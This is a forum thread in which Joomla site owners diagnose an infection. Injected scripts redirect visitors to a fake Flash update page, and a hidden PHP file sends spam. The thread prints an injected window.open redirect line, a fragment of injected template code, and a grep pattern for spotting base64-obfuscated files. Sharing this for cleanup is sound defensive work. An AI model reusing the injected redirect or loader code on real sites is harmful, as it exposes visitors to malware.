";} /*B6D1B1EE*/ ?> at top of site

[MiscCoder]

If you load the URL [url]http://*********.net/js/analytic.php?id=4&tz=60&rs=800x600[/url], ie with a time zone and screen dimensions then actually it returns this javascript

Code: Select all

window.open('http://************.com/update/gate.php?hash=096dc88a4cd59b79ba66d2f6e5cec427', '_self');

That URL which I have obscured is a fake Adobe update site, it is most likely trying to produce a fake Flash update notice to try to trick users into downloading malware, if it is not working then that is just good luck on our part.

This might be a new development, the other day it was just returning the exact same JS that called that URL in the first place.

edit: Actually I'm still just getting the same JS. Oh well.

[fcoulter]

It may be that it is designed to only return the fake Adobe update at random times, I think that this rather convoluted method of loading the malware is intended to try and generate confusion so that it is not picked up by malware scanners.

[maironrozendo]

Hi guys,
I have been affected by this injection as well and it seems that in some way javascript files and php files were created. At the beginning I reacted as you however I realised that the website is sending emails constantly to all clients and employees.
Have someone found a solution for it?
Follow my FPA

The same for me,

The attacker was using a HTPP POST to /libraries/phpxmlrpc/compat/article48.php send spam mail.

also changed the modified date of article48.php so that it wasnt obvious.

Also got some spam email from this forum as soon as I registered.

While I work out what to do I im using a static rip of the joomla site .

Hi harps_kal

How you stop send spam mail?

I have over 300 websites and have been contaminated about 10 websites.

I use Plesk Panel and I work with host, I'm turning off the PHP and notify customers.

Best Regards

[terryscott]

Actually I did some more testing, and it seems that the script injected into mod_stats may not be so harmless.

It seems to try to get information about the time zone and screen dimensions and then load itself again with that information supplied in the URL,

If you load the URL [url]http://*********.net/js/analytic.php?id=4&tz=60&rs=800x600[/url], ie with a time zone and screen dimensions then actually it returns this javascript

Code: Select all

window.open('http://************.com/update/gate.php?hash=096dc88a4cd59b79ba66d2f6e5cec427', '_self');

That URL which I have obscured is a fake Adobe update site, it is most likely trying to produce a fake Flash update notice to try to trick users into downloading malware, if it is not working then that is just good luck on our part.

This makes sense as the other day a fake Flash update page had loaded, but I had multiple tabs open at the time so it was tough to tell where it came from. This explains it though.

[terryscott]

Just noticed also in:

modules/mod_stats

There is a new file called:

jstats.php

Hopefully this sheds more light on things

[terryscott]

I just wanted to follow this up.
Whatever script was added to my site, something happened today, it tried running it from some new code in my template index file:

language=JavaScript id=onDate
language=JavaScript src=/media/system/js/stat052.php
";};$0520cee5=1; ?

But because I already deleted the media/system/js/stat052.php file it didn'y work and instead gave the site 500 errors when trying to access it.

Hope this helps someone.

[nigelbb]

I just found this hack in a Joomla 1.5 site that I host. I found other JS infections too but was able to track down the bad files & replace them with known good copies with some relatively simple measures so am adding my experiences in the hope that this can help others similarly afflicted. I have root access to the site on a WHM/cPanel managed virtual server so logged in as root & issued this command with results of similar form to this:-

Code: Select all

tail --lines=100 /usr/local/apache/logs/suphp_log
[Tue Sep 20 21:40:52 2016] [info] Executing "/home/websiteA/public_html/index.php" as UID 518, GID 514
[Tue Sep 20 21:41:12 2016] [info] Executing "/home/websiteB/public_html/index.php" as UID 533, GID 529
[Tue Sep 20 21:41:13 2016] [info] Executing "/home/websiteB/public_html/index.php" as UID 533, GID 529
[Tue Sep 20 21:41:49 2016] [info] Executing "/home/websiteB/public_html/index.php" as UID 533, GID 529
[Tue Sep 20 21:43:50 2016] [info] Executing "/home/websiteC/public_html/libraries/openid/Auth/OpenID/session57.php" as UID 551, GID 549

The bad JS is being run from the file libraries/openid/Auth/OpenID/session57.php on websiteC I found several files buried deep that had plausible names but were not part of the Joomla installation. There were files in the root of the website with filenames like system.php or licence.php which again were not part of the Joomla installation.

The key way of identifying the bad files was that they all contained base64 encoded obfuscated JS & can generally be found by searching for any files containing the base64 decode string in a fashion similar to this:-

Code: Select all

grep -r '"64_decode";return' /home/websiteC/www/*

Of course replace websiteC etc by the WHM username for the account that hosts the website. Once you have seen one of the hacked files the signature is pretty distinctive.

I know that the website needs upgrading but it's run by a small non-profit using Joomfish for multilingual features plus an ancient Wordpress for Joomla plugin & some other photo gallery plugins. It would be impossible to upgrade to Joomla 3.6 & the only realistic option is to eventually to start from scratch & replace it with a more easily managed Wordpress website which offers better security with minimal management. In the meantime all I can do is lock down the site as far as possible adding the post 1.5.26 security patches & monitoring the site rigorously with lfd so I can step in at any sign that it's been hacked.

[fcoulter]

The wordpress for joomla plugin still exists and is available for J3.6: https://extensions.joomla.org/extension ... for-joomla so I don't think this should be a barrier to updating.

Migrating Joomfish content is more difficult, you might do better re-creating those using the Joomla language manager.